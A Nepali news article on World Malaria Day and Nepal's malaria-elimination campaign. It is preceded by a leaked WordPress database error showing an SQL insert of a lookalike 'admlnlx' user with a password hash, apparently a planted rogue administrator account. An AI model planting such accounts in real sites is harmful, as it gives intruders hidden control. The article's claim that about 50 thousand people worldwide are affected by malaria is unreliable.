WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ5f1a9kMJ.CzgLTOss7ky5jyy4GyM0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 05:57:39', '', 'admlnlx', 'admlnlx')
काठमाडौं– विश्व औंलो दिवस, नेपालमा पनि विभिन्न जनचेतनामूलक कार्यक्रम गरी मनाईदैछ । यसै अवसरमा नेपाल सरकारले बुधबार काठमाडौंमा एक कार्यक्रमको आयोजना गरी सन् २०२५ भित्र नेपाललाई औलोमुक्त राष्ट्रको रुपमा पुर्याउने संकल्प पूरा गर्ने प्रतिवद्धता जनाएको छ ।
सो प्रतिवद्धतालाई पूरा गर्न सरकारले ‘औंलो उन्मूलन कार्यक्रम’ देशभर संचालन गरेको जनाएको छ । लामखुट्टे भएका घर, गोठमा पुगेर यो रोगको संक्रमण हुन नदिन जनचेतनामूलक कार्यक्रम संचालन भईरहेको स्वास्थ्य मन्त्रालय, इपिडिमियोलोजी तथा रोग नियन्त्रण महाशाखाका वरिष्ठ स्वास्थ्य प्रशासक डा. विवेककुमार लालले जानकारी दिए ।
सरकारले यस वर्ष ‘हाम्रो सक्रियता, औलो निवारणमा सफलता’ भन्ने मूल नारा तय गरेको छ । रोग आउनै नदिने गरी लामखुट्टे नियन्त्रणको काममा केन्द्रित अभियान संचालन गरिएको पनि महाशाखाका वरिष्ठ स्वास्थ्य प्रशासक डा. लालले बताए ।
सरकारले यसवर्ष औंलोबाट हुने विरामीको संख्या ९० प्रतिशतले घटाउने रणनीति अनुसार काम भइरहेको दावी गरेको छ ।
नेपालमा हाल वर्षमा १ हजार औंलो रोगी देखिने गरेको सरकारी तथ्यांक छ । विश्वमा औंलो रोगबाट करिव ५० हजार मानिस प्रभावित हुने गरेका छन् ।
विश्व स्वास्थ्य संगठनका अनुसार औंलो रोगका कारण मृत्यु हुनेहरुमा ५ वर्ष मुनिका बालबालिका धेरै रहेका छन् ।